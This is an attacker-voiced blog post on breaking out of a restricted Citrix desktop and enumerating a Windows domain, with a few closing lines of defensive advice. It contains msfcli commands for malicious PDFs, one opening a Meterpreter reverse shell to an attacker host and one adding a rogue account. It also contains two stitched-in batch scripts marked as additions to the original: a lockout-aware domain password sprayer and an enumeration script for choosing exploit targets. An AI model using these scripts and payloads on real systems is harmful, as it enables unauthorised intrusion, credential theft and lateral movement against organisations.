In this post I’ll be working against a pretty restricted remote desktop. I have once again locked down the desktop to the degree that it’s pretty unusable. I have Notepad and Internet Explorer (IE) available to me, and IE is apparently locked to the company homepage.
My goal is to bypass the restrictions and perform a little network enumeration, hopefully using the server for my own evil intentions rather than what it is intended for.
I start off by checking out the website that I can get to, looking for links out to the internet. Unfortunately I don’t find anything too useful there; it’s all very web 1.0. The admin has removed the address bar and nearly all the menu options. Most of what I would normally use to extend my reach into the server has been restricted and just hits me with a Restrictions dialog box.
I carry on looking for chinks in the armour and start to find a few things that may have been missed in the group policy. What you have to remember is that there are thousands of settings in group policy, and if they are not set up properly a seemingly irrelevant setting may lead to something useful to the attacker.
Here I see the Folders option has been left available.
And this allows me to go on to browse a list of available hosts on the network. What use is that, you say?
Well it gives me potential targets which may come in handy in later phases of my attack. Also if I start to see computers called Test-Server or Dev-Server I might want to take a closer look at them in particular.
I also see that the Print menu option has been left available.
Again, because this hasn’t been restricted I can use it to my advantage. Even though the admin has removed Help from the menus in Notepad and IE, luckily for me Microsoft provides plenty of links to Help elsewhere in the OS.
And again I can use links in the help pages to get back to a page which does give me the address bar that I want.
And if I can browse out from there I can get to my tools.
But what tools do I really need? Well, at the moment I should really find out a little more about the network, so that when I do download the tools I get just the ones I need, which makes erasing my tracks that little bit easier.
Even though the admin has taken away all the drive mappings, as long as I can find somewhere writable I can easily write a batch file in Notepad that launches a command shell. Once I have my shell things get even more interesting.
And because I can browse about a bit easier I can run my batch file and launch the shell.
Oh, that’s handy: using the net command (net accounts /domain) I can see the password and lockout policy, so I know how to tailor any brute-force attempts to avoid locking out accounts. So far, then, I have been able to look at a list of available computers and the password policy.
I could use “net user /domain >userlist.txt” to get myself a list of accounts on the domain. I know that I can run commands from the command line and create and execute batch files, so from there I can write a simple FOR loop to bring a little password brute-forcing to the party. But for now let’s not get carried away, and carry on with our Citrix fun.
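To show what that FOR loop looks like when it respects the lockout policy just read, here is an added example batch file (not from the original post). It makes exactly one attempt per domain account with a single candidate password, using only the built-in net command, so a run can never reach the lockout threshold on its own. The domain name CORP, the share \\FILESERVER\IPC$ and the English-language wording of the net output are assumptions, not details from the post.

```batch
@echo off
REM spray.bat: added example, not from the original post. One login attempt
REM per domain account with a single candidate password, using only the
REM built-in "net" command, so a run never exceeds the lockout threshold.
REM Run it once per password and wait longer than the "Lockout observation
REM window" shown by "net accounts /domain" between runs.
REM Assumptions (not from the post): domain CORP, reachable share
REM \\FILESERVER\IPC$, English-language "net" output. Adjust before use.
REM usage: spray.bat Password123
set "DOMAIN=CORP"
set "TARGET=\\FILESERVER\IPC$"
set "PASSWORD=%~1"
if "%PASSWORD%"=="" (
    echo usage: %~nx0 password-to-try
    exit /b 1
)

REM 1. Read the lockout threshold: the line reads "Lockout threshold:  5"
REM    or "Lockout threshold:  Never"; the third token is the value.
set "THRESHOLD="
for /f "tokens=3" %%a in ('net accounts /domain ^| findstr /i /c:"Lockout threshold"') do set "THRESHOLD=%%a"
if "%THRESHOLD%"=="" (
    echo Could not read the lockout policy; aborting rather than guessing.
    exit /b 1
)
echo Lockout threshold: %THRESHOLD%
if /i "%THRESHOLD%"=="Never" goto :spray
if %THRESHOLD% LEQ 1 (
    echo A threshold of %THRESHOLD% leaves no safe margin; aborting.
    exit /b 1
)

:spray
REM 2. Account list: "net user /domain" prints a banner, a dashed rule,
REM    up to three names per row, then a completion message. Strip the
REM    non-name lines. (Account names containing spaces will be split.)
net user /domain | findstr /v /i /c:"command completed" /c:"request will be" /c:"User accounts for" /c:"----" > userlist.txt
for /f "tokens=1-3" %%u in (userlist.txt) do (
    for %%n in (%%u %%v %%w) do call :try %%n
)
del userlist.txt
exit /b 0

:try
REM 3. A single attempt for the account passed as %1. Success leaves
REM    errorlevel 0; the session is dropped again immediately.
net use %TARGET% /user:%DOMAIN%\%1 %PASSWORD% >nul 2>&1
if not errorlevel 1 (
    echo [+] %DOMAIN%\%1 : %PASSWORD%
    net use %TARGET% /delete >nul 2>&1
) else (
    echo [-] %DOMAIN%\%1
)
exit /b 0
```

The point of reading the threshold first is the one made above: a lockout threshold of, say, 5 means each account can absorb only a handful of bad guesses before the observation window resets, so one password per run, with a pause between runs, keeps the accounts usable and the noise down.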
So I have a list of users, computers and security settings; what would be nice now is software versions. Well, I can easily see what the Notepad and IE versions are, and from my handy shell I can use the systeminfo command to see which hotfixes are applied.
The thing is, because this server is in a particularly hostile environment it “should” be patched to the hilt. What would be more useful is to see what third-party software is installed. Of course I can’t browse the C: drive through Explorer, but I can from the command prompt.
And what do we have here? Adobe Acrobat Reader. Even though it’s been removed from my menus I can launch it from the shell and check its version.
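Pulling the enumeration steps above together (host list, password policy, hotfixes, third-party software and its versions), here is an added example batch file, not from the original post, of the kind that could be typed into Notepad and run from the shell. It uses only built-in commands and writes everything to one text file. The domain name CORP and the assumption of a 32-bit install root under C:\Program Files are mine, not the post’s.

```batch
@echo off
REM enum.bat: added example, not from the original post. Written in Notepad,
REM run from the shell; everything goes to one text file so it can be
REM reviewed (and deleted) in one go. Uses only built-in commands.
REM Assumptions (not from the post): domain CORP and 32-bit Windows, so
REM third-party software lives under C:\Program Files; on 64-bit hosts
REM also check "C:\Program Files (x86)" and the WOW6432Node registry key.
set "OUT=enum.txt"

echo === Hosts visible in the domain === > "%OUT%"
net view /domain:CORP >> "%OUT%" 2>&1
echo === Host names worth a closer look (test/dev/staging) === >> "%OUT%"
net view /domain:CORP | findstr /i "test dev stag" >> "%OUT%"

echo === Password and lockout policy === >> "%OUT%"
net accounts /domain >> "%OUT%" 2>&1

echo === OS version and installed hotfixes === >> "%OUT%"
systeminfo | findstr /i /c:"OS Name" /c:"OS Version" /c:"Hotfix" /c:"KB" >> "%OUT%"

echo === Third-party software directories === >> "%OUT%"
dir /b "C:\Program Files" >> "%OUT%" 2>&1

echo === Installed software and versions (Uninstall key) === >> "%OUT%"
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s | findstr /i /c:"DisplayName" /c:"DisplayVersion" >> "%OUT%"

echo === Adobe Reader entries === >> "%OUT%"
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s | findstr /i "Adobe" >> "%OUT%"

echo Done - results in %OUT%
```

The Uninstall registry key is the quick way to get third-party version numbers without launching each application: the DisplayName and DisplayVersion values there are what Add/Remove Programs shows, which is exactly the information needed to decide whether a client-side exploit is worth building.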
Oh look at that. Version 8.1.2. I have a little Metasploit goodness for that.
Maybe I could create a PDF that connects back to a listener and gives me a Meterpreter session, which I could then use with the Citrix host as a pivot point to throw exploits at the softer targets:
./msfcli exploit/windows/fileformat/adobe_utilprintf filename=SiteDirections.pdf payload=windows/meterpreter/reverse_tcp lhost=x.x.x.x lport=6666 E
Or, knowing that it’s likely the version of Acrobat is the same elsewhere in the organisation, tailor a PDF to create an account on this or another system, and give it an enticing name that most (male) sysadmins will struggle to ignore.
./msfcli exploit/windows/fileformat/adobe_utilprintf filename=BritneyDoesParis.pdf payload=windows/adduser user=System-Backup pass=Password123 E
Anyway, there I am going off topic again; back to my remote desktop.
Assuming that I don’t find any vulnerable third-party apps, what else can I do from this restricted user’s locked-down desktop? Well, we all know how useful MMCs are, and from the printing help menu that I got to earlier I can search for one and, what do you know?
Launch the MMC from the handy shortcut that’s provided, add a few snap-ins here and there, and my restricted user Bob is starting to feel a little more comfortable in his “locked down” desktop.
Not many admins would be comfortable with restricted users having access to this level of information I imagine.
Speaking of desktops…
The possibilities are endless.
So that’s all for this post. I just want to finish by saying that these weaknesses can be mitigated by strong group policies and restrictions, but in my opinion the admin who creates them needs to think like the attacker and use multiple layers of defence. Group policies need to be coupled with a good patching regime (OS and third-party) and a strong degree of least privilege. It’s also important to remember that every single system on the network matters, not just the servers.
If you got this far thanks for reading.
Here are just a few useful keyboard shortcuts that might help you in your Citrix/Remote Desktop adventures.
SHIFT+F1 = Local task list
SHIFT+F2 = Toggle title bar
SHIFT+F3 = Close remote application
CTRL+F1 = Windows Security desktop (Ctrl+Alt+Del)
CTRL+F2 = Remote task list
CTRL+F3 = Remote Task Manager (Ctrl+Shift+Esc)
ALT+F2 = Cycle through programs
ALT+PLUS = Alt+Tab
ALT+MINUS = Alt+Shift+Tab
Ctrl+H = View history
Ctrl+I = View favorites
Ctrl+T = New tab (IE 7)
Ctrl+N = New window (a fresh browser instance)
Ctrl+O = Open internet address (the browse feature)
Ctrl+P = Print (to file)
Shift+F10 = Right-click context menu (e.g. Save Image As)
F1 = Help (and the jump to URL mentioned in Part 1)